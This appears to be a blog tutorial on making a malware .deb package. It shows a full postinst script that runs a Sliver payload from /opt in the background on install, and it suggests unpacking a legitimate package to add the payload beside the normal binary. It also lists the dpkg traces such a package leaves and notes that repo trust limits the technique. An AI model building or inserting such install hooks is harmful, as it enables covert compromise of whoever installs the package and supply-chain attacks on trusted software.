Yes, it's late and I should be in bed..but..I got to wonder a bit, how could you make a malware deb file ?
So, i thought it could be a fun little thing to try out, and it's pretty simple after all, and it really doesn't take that long. And no, the result of this little tutorial is NOT uploaded to the repo ;)
Building packages and Packaging scripts to deb files are required reading, and https://www.hivelocity.net/kb/what-are-preinst-postinst-prerm-and-postrm-script-2/
First, what is it we're trying to do ? Make a package with a Sliver payload, package it into a deb file, so when the deb is installed, the payload get's copied into place, and executed. Pretty simple after all.
So, there's two files we could think about having a look at and they are
preinst
This script executes before the package is unpacked from its Debian archive (“.deb”) file. Many preinst scripts stop services for packages which are being upgraded, pausing them until the installation or upgrade is complete (and following the successful execution of the postinst script).
postinst
This script typically completes any required configuration of the package foo once foo has been unpacked from its Debian archive (“.deb”) file. Often, postinst scripts ask the user for input, and/or warn the user that if they accept the default values, they should remember to come back and re-configure the package, as the situation warrants. Many postinst scripts then execute any commands necessary to start or restart services once a new package has been successfully installed or upgraded.
Since we only need to execute it after it has been unpacked and copied into place, let's go for the postinst file.
First, get the payload, and throw it into the packagedir/data, next we need the install file, and it looks like this
data/* /opt/ It simply just copies the payload into opt, so we know where to find it later. And yes, we could make systemd scripts and start those, and enable those, but that's for another tutorial, let's keep it simple.
Next up, we need to change the changelog, control and all the standard stuff, and last we need the postinst file, and it looks like this
cat -n postinst
1 #!/bin/sh
2 # postinst script for blackdragon-payloads-famous-quality
3 #
4 # see: dh_installdeb(1)
5
6 set -e
7
8 # summary of how this script can be called:
9 # * <postinst> `configure' <most-recently-configured-version>
10 # * <old-postinst> `abort-upgrade' <new version>
11 # * <conflictor's-postinst> `abort-remove' `in-favour' <package>
12 # <new-version>
13 # * <postinst> `abort-remove'
14 # * <deconfigured's-postinst> `abort-deconfigure' `in-favour'
15 # <failed-install-package> <version> `removing'
16 # <conflicting-package> <version>
17 # for details, see https://www.debian.org/doc/debian-policy/ or
18 # the debian-policy package
19
20
21 case "$1" in
22 configure)
23 /opt/FAMOUS_QUALITY &
24 ;;
25
26 abort-upgrade|abort-remove|abort-deconfigure)
27 ;;
28
29 *)
30 echo "postinst called with unknown argument \`$1'" >&2
31 exit 1
32 ;;
33 esac
34
35 # dh_installdeb will replace this with shell code automatically
36 # generated by other debhelper scripts.
37
38 #DEBHELPER#
39
40 exit 0
This is the entire file, but there's only one interesting thing here, in line 23. here I changed the script to run our binary if the script parameter is configure, it was a test to see if this would work, and it does.
It starts the payload as soon as the deb gets installed.
And now, we could make a couple of uninstall cases, and so on, but why bother. It's not meant to be uninstalled in an easy way :)
So, now you know how to make a malware deb. Now the idea would be to take a normal deb, unpack it, add our little surprise, change the install and postinst scripts, to launch the ordinary binary, AND our own little gem ;)
But, I would point out, before you get excited, that this does leave a trace and it's pretty obvious that this is malware. Let's see what it leaves us with. If we look at /var/lib/dpkg/info, and grep for payloads (yes lame name, I know)
[/var/lib/dpkg/info]
└─# ls -al | grep payloads
-rw-r--r-- 1 root root 235 17 feb 12:21 blackdragon-payloads-famous-quality.list
-rw-r--r-- 1 root root 244 17 feb 05:58 blackdragon-payloads-famous-quality.md5sums
-rwxr-xr-x 1 root root 1001 17 feb 05:58 blackdragon-payloads-famous-quality.postinst
Let's see what's in the list file, it should be a list of all the files in the package
cat blackdragon-payloads-famous-quality.list
/.
/opt
/opt/FAMOUS_QUALITY
/usr
/usr/share
/usr/share/doc
/usr/share/doc/blackdragon-payloads-famous-quality
/usr/share/doc/blackdragon-payloads-famous-quality/changelog.gz
/usr/share/doc/blackdragon-payloads-famous-quality/copyright
And it is. Now we know what files it left, so we can hunt them down, and get rid of them.
And, the postinst fle from /var/lib/dpkg/info
cat blackdragon-payloads-famous-quality.postinst
#!/bin/sh
# postinst script for blackdragon-payloads-famous-quality
#
set -e
case "$1" in
configure)
/opt/FAMOUS_QUALITY &
;;
abort-upgrade|abort-remove|abort-deconfigure)
;;
*)
echo "postinst called with unknown argument \`$1'" >&2
exit 1
;;
esac
So, not the most stealthy way of installing malware, and there's the point to make that, every smart admin would only allow installing debs from known and trusted repos, so for this to work, we would have to hack into the repo server, make a deb, and find some way to install it on the target / patch a packet they trust, so again, there's smarter ways to go about it ;)
Much Happy maldeb'ing :)